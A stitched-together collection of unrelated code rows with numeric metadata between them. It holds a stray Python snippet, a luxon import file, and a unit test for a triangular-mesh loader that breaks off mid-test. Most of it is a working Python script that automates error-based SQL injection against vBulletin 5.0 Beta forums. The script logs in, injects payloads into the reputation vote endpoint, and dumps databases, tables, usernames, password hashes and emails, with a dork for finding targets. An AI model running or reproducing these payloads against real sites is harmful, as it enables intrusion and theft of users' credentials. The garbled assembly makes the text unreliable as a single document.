3916804498399317331273132924185707147349566916674687634660915035914677504995186714302352196288948901024233251169136196266227326746080059154747183079839286853520694694454072476841822524674417161514036427982273348055556214818971426179103425986472045168939894221798260880768528778364618279934631376775430780936333301898264209010848802521674670883215120185883543223812876952786713296124747824645386369930090493103636197638780396218407357239979422340623539380833965132740801111666627891981488087797941876876144230030984490851411606618262936828367647447792391803351109890697907148578694408955299065364044742557608365997664579509666024396409905389607120198219976047599490197230297649139826800329731560371200413779037855660850892521673093931987275027546890690370753941304265231501194809377245048795150954100921645863754710598436791786391670211874924319957006419179697775990283006991536871371193661495281130587638027841075444973307840789923115535562561142322423255033685442488917353448899115014406480203690680639606723221932041495354150312888033953605329934036800697771065056663195481234880673210146739058568557934581403627822703280826165707739483275922328459417065250945123252306082291880205877731971983945018088807242966198081119777158542502016545090413245809786882778948721859617721078384350691861554356628840622574736922845095162084960398013400172393067166682355524525280460972253503534226472524250874054075591789781264330331690"
str = [int(i) for i in str.split("\n")]
S = sum(str)
resultat = S[:10]
print(resultat)
input() | 729.571429 | 5,006 | 0.990405 | 20 | 5,107 | 252.9 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.983474 | 0.004699 | 5,107 | 7 | 5,007 | 729.571429 | 0.011607 | 0 | 0 | 0 | 0 | 0 | 0.979812 | 0.97942 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
c5e31358f17fde1f17f92838fb43a679a26ea958 | 23,424 | py | Python | Vbulletin 5.0 auto injector.py | xceptioncode/VBulletin-5.0-auto-sql-injector | 2ed6b3c673f9f08dab906730e556ab3ea977464c | [
"MIT"
] | 5 | 2015-07-02T07:49:16.000Z | 2020-09-17T21:42:30.000Z | Vbulletin 5.0 auto injector.py | xceptioncode/VBulletin-5.0-auto-sql-injector | 2ed6b3c673f9f08dab906730e556ab3ea977464c | [
"MIT"
] | null | null | null | Vbulletin 5.0 auto injector.py | xceptioncode/VBulletin-5.0-auto-sql-injector | 2ed6b3c673f9f08dab906730e556ab3ea977464c | [
"MIT"
] | null | null | null | #!/usr/bin/python
# File : VBulletin 5.0 Beta Exploit
#
# Date : 14.04.2013
#
# Vulnerability : Sql Injection
# Vulnerable Version : VBulletin 5.0 Beta ( All Upto Beta 28 )
#
# Exploit Author : Shubham Raj (Xception Code)
# Facebook : http://www.facebook.com/xceptioncode
# Twitter : https://twitter.com/xceptioncode
#
# This is an exploit to automate process of exploiting Vbulletin 5.0 Beta
# With sql inection vulnerability.
# This vulnerability exists in almost all beta releases of Vbulletin 5.0 till date which is beta 28.
#
# Vulnerability Discovered By 0x0A
# Exploit Coded By Shubham Raj
#
# Join Openfire-Security Forum : http://www.openfire-security.net/forum/
#
# Script Publicly released on 28.06.2013 In Openfire Security Forum
# link => http://forum.openfire-security.net/threads/vbulletin-5-0-automatic-injector-and-data-extractor-python-download-xception-code.12241/
#
#
# Google Dork : Powered by vBulletin™ Version 5.0.0 Beta etc etc (apply your brain)
import urllib2, sys, re, urllib, os
from cookielib import CookieJar
def use():
print "[=] Usage : exploit.py SITE USERNAME PASSWORD NODEID OPTION(common/all)"
print "[=] Example : www.host.com/forum/ xxxx xxxxx 124 common/all"
print "\n[=] Or enter help to get described option, like exploit.py help"
exit()
def help():
print """
[=] Usage : exploit.py SITE USERNAME PASSWORD NODEID OPTION(common/all)
[=] Example : www.host.com/forum xxxx xxxxx 124 common/all
Options = common / all
common :
If you will choose common as option, you will get some basic extracted data from
given target like version,
current database name, current user name, first row from table user of current
database if exist.
all :
if you will choose all as option, it will give you all info that you got in common
option along with :
auto extraction of databases
auto extraction of all datas from table user of current database if exist,
extraction of tables of given database ( user input )
extraction of columns of given database and table( user input )
fetching data from give database -> table -> column
Also, more control over the process and all.
All output automatically get saved to target(name).txt in current directory.
if file already exists, it starts appending output to existing file.
To use this exploit, first you must be registered to your target site.
Next, you should have a valid node id.
SITE :
site is your target site link followed with vbulletin path and a slash at end.
USERNAME :
username is your username with which you have registered on target site
Password :
password is password for given username
NODE_ID :
To get node id for your target site, follow these steps :
1. login to your target using your credentials using mozilla firefox
2. open any topic/thread on target
3. open "LIVE HTTP HEADERS" in browser. You can install "LIVE HTTP HEADERS"
from here : https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/
4. Install "LIVE HTTP HEADERS"
5. On any topic/thread of target, click like button at below of the post.
( Image => http://s9.postimg.org/ij0gr72by/forum1.jpg )
6. Now, find up this link in "LIVE HTTP HEADERS" , link = target/ajax/api/reputation/vote
( Image => http://s12.postimg.org/492ph1y4t/forum2.png )
7. Now, click on replay button "LIVE HTTP HEADERS", and on send post content.
You will get nodeid=value ( Image => http://s7.postimg.org/op271c116/forum3.jpg )
8. So, here value is node_id . Use value of node id to inject and exploit your target.
Exploit Information :
Vulnerability : Sql Injection
Vulnerable Version : VBulletin 5.0 Beta ( All Upto Beta 28 )
Vulnerability Credit : 0x0A
Contact : Not Available
Exploit Author : Xception Code
Contact : http://www.facebook.com/xceptioncode
This is an exploit to automate process of exploiting Vbulletin 5.0 Beta
With sql injection vulnerability.
This vulnerability exists in almost all beta releases of Vbulletin 5.0 till date which is beta 28.
Vulnerability Discovered By 0x0A
Exploit Coded By Xception Code
"""
try:
print """\t\t\t
\t\t__ __ _ _
\t\t\ \/ /___ ___ _ __ | |_(_) ___ _ __
\t\t \ // __/ _ \ '_ \| __| |/ _ \| '_ \
\t\t / \ (_| __/ |_) | |_| | (_) | | | |
\t\t/_/\_\___\___| .__/ \__|_|\___/|_| |_|
\t\t |_|
\t\t ___ _
\t\t / __\___ __| | ___
\t\t / / / _ \ / _` |/ _ \
\t\t/ /__| (_) | (_| | __/
\t\t\____/\___/ \__,_|\___|
\t\t\t\t\t VBulletin 5.0 Automated Injector.
"""
if sys.argv[1] == 'help':
help()
elif len(sys.argv) < 5:
use()
else:
pass
host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
node = sys.argv[4]
opt = sys.argv[5]
new_host = host.replace('.', '_')
new_host1 = new_host.replace('http://', '')
new_host2 = new_host1.replace('/', '')
def common():
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = { "url" : host, "username" : username, "password" : password }
data_encoded = urllib.urlencode(formdata)
print "\n[+] Logging in .. "
print "[+] Username : " + username + ""
print "[+] Password : " + password + ""
print "[+] Node id : " + node + ""
if os.path.exists(new_host2 + '.txt'):
file = open(new_host2 + '.txt', "a")
else:
file = open(new_host2 + '.txt', "w")
print "\n[+] Saving output to " + new_host2 + ".txt in current directory"
file.write('\n[+] Site given to inect : ' + host + "\n")
login_host = host + 'auth/login'
response = opener.open(login_host, data_encoded)
vote_host = host + 'ajax/api/reputation/vote'
print "\n\t\t\t\t[=] Requesting datas... [=]\n"
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(version() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] version : ' + result.group(1) + ""
file.write('[+] version : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(database() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Current Database : ' + result.group(1) + ""
current_db = result.group(1)
current_db = current_db.strip("'")
file.write('[+] Current Database : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] User : ' + result.group(1) + ""
file.write('[+] User : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(system_user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] System User : ' + result.group(1) + ""
file.write('[+] System User : ' + result.group(1) + "\n")
print "\n[=] Trying to extract first row of table user from current database. To extract more go with all option! "
file.write("\n[=] Trying to extract first row of table user from current database. To extract more go with all option! \n")
try:
ext = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, ext)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
print '\n[+] username : Password => ' + upwd[0] + " : " + upwd[1]
file.write('\n[+] username : Password => ' + upwd[0] + " : " + upwd[1] + "\n")
except KeyboardInterrupt:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "[=] May be table user doesn't exist in current database.Try with option all."
print "\n[+] You had choosed common option for extraction. Choose all for more options and extraction."
print "\n[=>] Enjoy."
file.write("\n[+] You had choosed common option for extraction. Choose all for more options and extraction.\n")
file.write("\n[=>] Enjoy.")
file.close()
def all():
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
formdata = { "url" : host, "username" : username, "password" : password }
data_encoded = urllib.urlencode(formdata)
print "\n[+] Logging in .. "
print "[+] Username : " + username + ""
print "[+] Password : " + password + ""
print "[+] Node id : " + node + ""
if os.path.exists(new_host2 + '.txt'):
file = open(new_host2 + '.txt', "a")
else:
file = open(new_host2 + '.txt', "w")
print "\n[+] Saving output to " + new_host2 + ".txt in current directory"
file.write('\n[+] Site given to inect : ' + host + "\n")
login_host = host + 'auth/login'
response = opener.open(login_host, data_encoded)
vote_host = host + 'ajax/api/reputation/vote'
print "\n\t\t\t\t[=] Requesting datas... [=]\n"
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(version() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] version : ' + result.group(1) + ""
file.write('[+] version : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(database() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Current Database : ' + result.group(1) + ""
current_db = result.group(1)
current_db = current_db.strip("'")
file.write('[+] Current Database : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] User : ' + result.group(1) + ""
file.write('[+] User : ' + result.group(1) + "\n")
nagic = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select concat(0x787e63,0x27,cast(system_user() as char),0x27,0x787e63)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, nagic)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] System User : ' + result.group(1) + ""
file.write('[+] System User : ' + result.group(1) + "\n")
try:
print "\n[=] Trying to extract first row of table user from current database."
file.write("\n[=] Trying to extract first row of table user from current database. \n")
ext = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, ext)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
print '[+] username : Password => ' + upwd[0] + " : " + upwd[1]
file.write('\n[+] username : Password => ' + upwd[0] + " : " + upwd[1] + "\n")
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(*),0x27,0x787e63) FROM user )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of datas [table = user] : ' + result.group(1) + ""
file.write('\n[+] Count of datas [table = user] : ' + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
option = raw_input("[=] Would you extract all datas of [Table = user] [Column = username,password,email] ? (yes/no) ")
if option == 'yes':
for a in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,username,0x7e,password,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT " + str(a) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
upwd = u_p.split('~')
email = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,email,0x27,0x787e63) FROM " + current_db + "." + "user LIMIT " + str(a) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, email)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
u_p = result.group(1)
u_p = u_p.strip("'")
print '\n[+] Username : Password : Email => ' + upwd[0] + " : " + upwd[1] + " : " + u_p
file.write('\n[+] Username : Password : Email => ' + upwd[0] + " : " + upwd[1] + " : " + u_p + "\n")
else:
print "[=] Choosed not to extract data.. "
except KeyboardInterrupt:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except:
print "\n[=] Error in retriving datas from table 'user' of current db. "
print "[=] May be table user doesn't exist in current database.Try going through option fetching datas.\n"
vote_host = host + 'ajax/api/reputation/vote'
count = 'nodeid=' + node +') and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,count(schema_name),0x27,0x787e63) FROM information_schema.schemata )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '[+] Count Of Databases : ' + result.group(1) + ""
file.write('[+] Count Of Databases : ' + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all databases..."
for c in range(0, count):
db = 'nodeid=' + node + ') and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(schema_name as char),0x27,0x787e63) FROM information_schema.schemata LIMIT ' + str(c) + ',1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x'
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result == None:
exit
else:
print '[+] Database [%s] : ' % c + result.group(1) + ""
file.write('[+] Database [%s] : ' % c + result.group(1) + "\n")
option = raw_input("\n[=] Would you like to extract databases tables ? (yes/no) ")
if option == 'yes':
print "[+] Choosed to extract database tables too. "
dbs = raw_input("[=] Enter database name to extract tables : " )
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(table_name),0x27,0x787e63) FROM `information_schema`.tables WHERE table_schema='" + dbs + "')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of table where [database = %s] : ' % dbs + result.group(1) + ""
file.write('\n[+] Count of table where [database = %s] : ' % dbs + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all tables..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(table_name as char),0x27,0x787e63) FROM information_schema.tables Where table_schema='" + dbs + "' LIMIT " + str(c) + ",1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result.group(1) == None:
print "[=] Error in retrieving datas or you entered a wrong database name "
exit
else:
print '[+] Table [%s] [%s] : ' % (dbs, c) + result.group(1) + ""
file.write('[+] Table [%s] [%s] : ' % (dbs, c) + result.group(1) + "\n")
elif option == 'no':
print "[=] You choosed not to extract tables."
else:
print "[=] Invalid Option. Exiting.. "
exit()
option_column = raw_input("\n[=] Would you like to extract columns ? {yes/no) ")
if option_column == 'yes':
print "[+] Choosed to extract columns too"
dbs = raw_input("[=] Enter database name to extract columns : " )
table = raw_input("[=] Enter table name to extract columns : " )
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(column_name),0x27,0x787e63) FROM `information_schema`.columns WHERE table_schema='" + dbs + "' AND table_name='" + table + "')) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of column where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + ""
file.write('\n[+] Count of column where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all columns..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x787e63,0x27,cast(column_name as char),0x27,0x787e63) FROM `information_schema`.columns WHERE table_schema='" + dbs + "' AND table_name='" + table + "' LIMIT " + str(c) +",1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=s"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result.group(1) == None:
print "[=] Error in retrieving datas or you entered a wrong database or table name "
exit
else:
print '[+] Column [%s] [%s] [%s] : ' % (dbs, table, c) + result.group(1) + ""
file.write('[+] Column [%s] [%s] [%s] : ' % (dbs, table, c) + result.group(1) + "\n")
elif option == 'no':
print "[=] You choosed not to extract tables."
else:
print "[=] Invalid Option. "
option_column = raw_input("\n[=] Would you like to fetch datas ? {yes/no) ")
if option_column == 'yes':
print "[+] Choosed to fetch datas too"
dbs = raw_input("[=] Enter database name : " )
table = raw_input("[=] Enter table name : " )
column = raw_input("[=] Enter column name : ")
print "[=] Counting data of given column .. "
count = 'nodeid=' + node +") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27,count(*),0x27,0x787e63) FROM " + dbs + "." + table + " )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, count)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
print '\n[+] Count of datas where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + ""
file.write('\n[+] Count of datas where [database = %s] [table = %s] : ' % (dbs, table) + result.group(1) + "\n")
count = result.group(1)
count = count.strip("'")
count = int(count)
print "\n[=] Extracting all datas of given column..."
for c in range(0, count):
db = 'nodeid=' + node + ") and(select 1 from(select count(*),concat((select (select (SELECT concat(0x787e63,0x27," + column + ",0x27,0x787e63) FROM " + dbs + "." + table + " LIMIT " + str(c) + ",1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (x=x"
response = opener.open(vote_host, db)
new = response.read()
f = new
result = re.search('x~c(.*)x~c', f)
if result.group(1) == None:
print "[=] Error in retrieving datas or you entered a wrong database or table name "
exit
else:
print '[+] Column [%s] [%s] [%s] [%s] : ' % (dbs, table, column, c) + result.group(1) + ""
file.write('[+] Column [%s] [%s] [%s] [%s] : ' % (dbs, table, column, c) + result.group(1) + "\n")
elif option == 'no':
print "[=] You choosed not to extract datas. Exiting.."
file.close()
exit()
else:
print "[=] Invalid Option. Exiting.. "
file.close()
exit()
if opt == 'all':
all()
elif opt == 'common':
common()
except KeyboardInterrupt:
print "\n[-] Keyboard interrupted or ctrl+c pressed. Try again."
except Exception as e:
print "\n[-] Error Occured. Try again. "
print "\n[=] Enter 'help' to get help. Example : exploit.py help"
| 45.75 | 404 | 0.639643 | 3,433 | 23,424 | 4.295368 | 0.100495 | 0.048827 | 0.068358 | 0.080564 | 0.791469 | 0.779127 | 0.7638 | 0.759392 | 0.744744 | 0.726163 | 0 | 0.035941 | 0.194672 | 23,424 | 511 | 405 | 45.83953 | 0.745653 | 0.039489 | 0 | 0.583333 | 0 | 0.108586 | 0.602501 | 0.149157 | 0.010101 | 0 | 0.023317 | 0 | 0 | 0 | null | null | 0.050505 | 0.005051 | null | null | 0.176768 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a8bf5cd4c2925f4a20cbb443379799d09608cef7 | 92 | py | Python | luxon/core/policy/__init__.py | HieronymusCrouse/luxon | b0b08c103936adcbb3dd03b1701d44a65de8f61e | [
"BSD-3-Clause"
] | 7 | 2018-02-27T00:18:02.000Z | 2019-05-16T16:57:00.000Z | luxon/core/policy/__init__.py | HieronymusCrouse/luxon | b0b08c103936adcbb3dd03b1701d44a65de8f61e | [
"BSD-3-Clause"
] | 47 | 2018-01-23T13:49:28.000Z | 2019-06-06T13:14:59.000Z | luxon/core/policy/__init__.py | HieronymusCrouse/luxon | b0b08c103936adcbb3dd03b1701d44a65de8f61e | [
"BSD-3-Clause"
] | 14 | 2018-01-15T08:47:11.000Z | 2019-12-27T12:05:41.000Z | from luxon.core.policy.compiler import compiler
from luxon.core.policy.policy import Policy
| 30.666667 | 47 | 0.847826 | 14 | 92 | 5.571429 | 0.428571 | 0.230769 | 0.333333 | 0.487179 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086957 | 92 | 2 | 48 | 46 | 0.928571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
a8d7af4b502c25795cf41c3955e883aa42435475 | 17,151 | py | Python | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 3 | 2019-11-18T21:06:40.000Z | 2022-01-28T14:45:00.000Z | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 2 | 2020-09-19T14:32:02.000Z | 2022-01-24T12:22:44.000Z | test/testAbTriangularMesh.py | menta78/alphaBetaLab | 8fac6cc5bd640a008bb9c0d85702053bf010e071 | [
"MIT"
] | 2 | 2018-11-29T10:36:01.000Z | 2021-06-16T03:29:01.000Z | import unittest
import os
import numpy as np
from shapely import geometry as g
from alphaBetaLab import abTriangularMesh
plotPolygons = False
class testAbTriangularMesh(unittest.TestCase):
def testLoadFromGr3File1(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridGiamaica.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(708, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([253, 302, 400], feMeshSpec.connectionPolygons[200])
self.assertEqual(410, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((-77.3890650728, 17.6616614616), feMeshSpec.nodes[350])
self.assertEqual(410, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(1372, feMeshSpec.nodeBathy[150])
self.assertEqual(64, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertFalse(5 in feMeshSpec.openBoundaryNodes)
self.assertTrue(22 in feMeshSpec.openBoundaryNodes)
bnd = np.unique(list(feMeshSpec.openBoundaryNodes.values()))
self.assertEqual([1], bnd)
self.assertEqual(1, feMeshSpec.openBoundaryNodes[22])
self.assertEqual(48, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(3 in feMeshSpec.landBoundaryNodes)
self.assertTrue(25 in feMeshSpec.landBoundaryNodes)
bnd = np.unique(list(feMeshSpec.landBoundaryNodes.values()))
self.assertEqual([1], bnd)
def testLoadFromGr3File2(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridSmallIsland.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(507, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([262, 280, 263], feMeshSpec.connectionPolygons[200])
self.assertEqual(287, len(feMeshSpec.nodes.keys()))
self.assertAlmostEqual((155.9556546618, -57.5789348057), feMeshSpec.nodes[150])
self.assertEqual(287, len(feMeshSpec.nodeBathy.keys()))
self.assertAlmostEqual(-3368, feMeshSpec.nodeBathy[150])
self.assertEqual(0, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(35, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertFalse(100 in feMeshSpec.landBoundaryNodes)
self.assertTrue(27 in feMeshSpec.landBoundaryNodes)
self.assertEqual(1, feMeshSpec.landBoundaryNodes[27])
self.assertEqual(2, feMeshSpec.landBoundaryNodes[5])
bnd = np.unique(feMeshSpec.landBoundaryNodes.values())
bnd.sort()
self.assertTrue(np.logical_and([1, 2], bnd).all())
def testLoadFromGr3File3(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec = abTriangularMesh.loadFromGr3File(mshFilePath)
# some random checks
self.assertEqual(1587, len(feMeshSpec.nodes.keys()))
self.assertEqual(2819, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([500, 537, 525], feMeshSpec.connectionPolygons[100])
self.assertEqual(2, len(feMeshSpec.openBoundaries.keys()))
bndnds = feMeshSpec.openBoundaries[2]
self.assertEqual(6, len(bndnds))
self.assertEqual(1556, bndnds[3])
self.assertEqual(11, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryOrdered))
self.assertEqual(5, len(feMeshSpec.landBoundaries.keys()))
self.assertEqual(5, len(feMeshSpec.landBoundaryType.keys()))
self.assertEqual(abTriangularMesh.landBoundaryExteriorType, feMeshSpec.landBoundaryType[1])
self.assertEqual(abTriangularMesh.landBoundaryIslandType, feMeshSpec.landBoundaryType[5])
bndnds = feMeshSpec.landBoundaries[3]
self.assertEqual(8, len(bndnds))
self.assertEqual(453, bndnds[-1])
def testSaveGr3File(self):
mdldir = os.path.dirname( os.path.abspath(__file__) )
mshFilePath = os.path.join(mdldir, 'triangularMeshTest/hgridWestMed.gr3')
feMeshSpec0 = abTriangularMesh.loadFromGr3File(mshFilePath)
tmpfnm = './_tmp.gr3'
feMeshSpec0.saveAsGr3(tmpfnm)
try:
feMeshSpec = abTriangularMesh.loadFromGr3File(tmpfnm)
# some random checks
self.assertEqual(1587, len(feMeshSpec.nodes.keys()))
self.assertEqual(2819, len(feMeshSpec.connectionPolygons.keys()))
self.assertEqual([500, 537, 525], feMeshSpec.connectionPolygons[100])
self.assertEqual(2, len(feMeshSpec.openBoundaries.keys()))
bndnds = feMeshSpec.openBoundaries[2]
self.assertEqual(6, len(bndnds))
self.assertEqual(1556, bndnds[3])
self.assertEqual(11, len(feMeshSpec.openBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryNodes.keys()))
self.assertEqual(352, len(feMeshSpec.landBoundaryOrdered))
self.assertEqual(5, len(feMeshSpec.landBoundaries.keys()))
self.assertEqual(5, len(feMeshSpec.landBoundaryType.keys()))
